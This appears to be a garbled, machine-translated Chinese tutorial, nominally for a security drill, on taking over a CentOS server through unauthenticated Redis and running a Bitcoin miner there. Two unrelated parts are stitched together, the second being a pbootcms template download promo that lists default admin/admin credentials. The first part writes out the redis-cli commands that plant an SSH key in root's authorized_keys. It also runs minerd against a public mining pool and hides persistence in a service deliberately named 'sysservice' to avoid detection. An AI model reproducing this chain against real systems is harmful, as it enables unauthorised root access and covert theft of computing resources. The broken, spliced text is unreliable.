近日,公司需要进行安全运维应急演练,部署应急演练环境。考虑到几个月前,该公司一台服务器中的漏洞导致一个挖矿程序被释放,因此决定部署一个组合的 Redis & Minerd 演习环境。
环境信息如下:
目标服务器:Centos6;
目标IP:192.168.82.6;
首先,您需要安装 redis 并分别执行以下命令:
wget http://download.redis.io/releases/redis-3.2.5.tar.gztar xzf redis-3.2.5.tar.gzcd redis-3.2.5makemake install
执行成功完成后,运行:redis-server 可以运行 redis 服务;启动 Redis 服务时,请阅读配置文件 redis.conf 信息进行相应配置;需要更改 redis.conf 的两个默认配置项,以利用 Redis 未经身份验证的授权漏洞。
将 bind127.0.0.1 更改为:bind0.0.0.0;以便可以从外部机器访问 Redis 服务;此外,保护模式必须更改为 no,并且必须关闭 Redis 服务的保护模式,否则很难通过 Redis 客户端正常访问 Redis 服务。需要
借助 redis 未经认证的授权漏洞获取 192.168.82.6 这台机器的无密码登录权限,具体步骤白天已经详细讲解过,这里就不赘述了。
在可以连接到 192.168.82.6 服务器的任何计算机上,执行以下命令:
SSH-Keygen-TRSA
(echo-e“nn”; cat/root/.ssh/id_rsa.pub; echo-e“nn”)>foo.txt
catfoo.txt|redis-cli-h192.168.82.6-xsetcrackit
redis-cli-h192.168.82.6configsetdir/root/.ssh/
配置盖迪尔
configsetdb文件名“authorized_keys”
救
完成上一个操作后,无需密码即可登录192.168.82.6,效果如下:
至此,我们能否成功获得对192.168.82.6的root访问权限,是时候进行minerd了。 minerd 是一个比特币挖矿程序,在服务器上运行并消耗 CPU 资源。
您可以通过 gitclone 下载源码包进行编译安装,具体的编译步骤可以根据说明和步骤进行。
安装成功后,
可执行程序 minerd 将在目录中生成挖矿网站源码,执行 minerd-h,并输出以下内容以指示安装成功。
接下来就是如何在目标服务器上运行挖矿程序,要正常运行挖矿程序,需要有一个矿池,
也就是说,一个挖矿服务器,在BTCC、Antpool、F2pool上注册一个,注册成功后就可以使用他们提供的矿池启动你的挖矿程序了。
拿起它并在目标服务器上执行它:minerd-ostratum+tcp://stratum.btcc.com:25-u pool subaccount-p 任意密码;出现以下输出时,表示矿工运行成功,然后看一下CPU使用率。
你可以让矿工在后台运行,虽然你退出命令行界面,但程序仍然会正常运行。此时,设置了一个简单的环境,用于运行具有 Redis 漏洞的矿工。而当你发现矿区进程正在运行并且消耗CPU时,就可以杀死进程,如何保证地雷进程被杀死后可以继续启动和执行?这里有两种形式,一种是通过定时任务的方法,另一种是通过服务的形式。
定时任务的方法在这里不再赘述,只需添加定时任务的开始时间,然后通过 crontab-e 执行命令即可。
以下是对服务形式的详细介绍。该服务可以持续检测地雷是否正在运行,如果不运行,它将运行地雷;服务也可以自动启动。这个服务的内容如下,服务是判断目标服务器的路径环境变量配置的目录是否有minerd,如果存在,就不会被处理,如果不存在,可以将minerd复制到其他文件夹下到这个目录下,然后判断minerd程序是否执行, 如果没有,请运行挖矿程序:
我们可以将服务名称设置为名称
类似于系统服务来实现混淆并降低发现服务的难度,这里我简单地命名为 sysservice。然后在 /etc/init.d/ 下创建一个同名 sysservice 的文件,因为 sysservice 在作为服务启动、停止和重新启动时会在这里调用挖矿网站源码,文件内容如下:
还有最后一步,要启动,需要在 /etc/rc3.d 目录下创建一个新的链接文件指向 sysservice(ln-sf/etc/init.d/sysserviceS2222sysservice,其中 22 表示服务的优先级,数字越小,启动优先级越高),因为这个目录是系统启动时手动搜索的目录, 将运行此目录下的符号联接文件的目标文件。这样,即使重启目标服务器,也可以启动sysservice,从而启动挖矿程序,并设置这样一个埋地的安全应急演练环境。
在建立安全性的过程中
演习环境,即将与战士们博弈,充分了解漏洞形成和利用的场景,在应对安全风暴的过程中也能得心应手。
注:由于最近陌陌改变了推送机制,经常有同学表示错过了之前的搭建教程文章,每次都要主动搜索才能找到公众号。 所以建议大家加star以便尽快收到推送。
大家好,我是评测君,欢迎来到网络评测。 本期给大家带来一套pbootcms开发的练习网站自适应模板php源码。 这是之前和我分享过的同学。 有兴趣的同学可以自行下载学习。
视频教程
技术框架文本构建教程
下载源码,在宝塔中添加站点网站源码php,选择PHP版本7.0。
压缩源码目录,上传到宝塔网站根目录并解压,关闭防跨站,伪静态设置如下:
location / {
if (!-e $request_filename){
rewrite ^/index.php(.*)$ /index.php?p=$1 last;
rewrite ^(.*)$ /index.php?s=$1 last;
}
}
获取官方免费授权码
将/config/config.php文件中的授权码修改为自己的授权码
后台地址为:您的域名/admin.php 默认账号密码:admin admin
系统介绍
这是一个文档下载网站源码网站源码php,一个作文网站pbootcms模板,适合构建学习资料、文档资源、作文网站、文章下载、资讯、论文等相关网站,有200+整站页面,可轻松定制。
系统截图
获取方法一
发送密钥号码:203
获取方法二
扫描小程序码
找不到您要找的东西?
扫一扫告诉我们您最想要的资源
关于资源下载
网站上的所有源码资源均不是源码资源的价格,源码本身是免费的。 这是赞助录制视频教程、收集整理资源、服务器维护的基本费用!
不想付费的同学可以去GitHub或者Gitee搜索相关开源项目,了解他们的开源合约。 然后按照视频教程进行构建。